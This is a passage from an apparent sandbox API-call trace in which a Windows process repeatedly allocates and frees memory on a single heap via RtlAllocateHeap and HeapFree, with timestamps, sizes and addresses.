Size=0x20) returned 0xdce9660 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.046] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.046] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.047] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.047] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.048] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.048] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.049] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.049] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.050] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.050] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.052] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.052] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.053] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.053] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.054] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 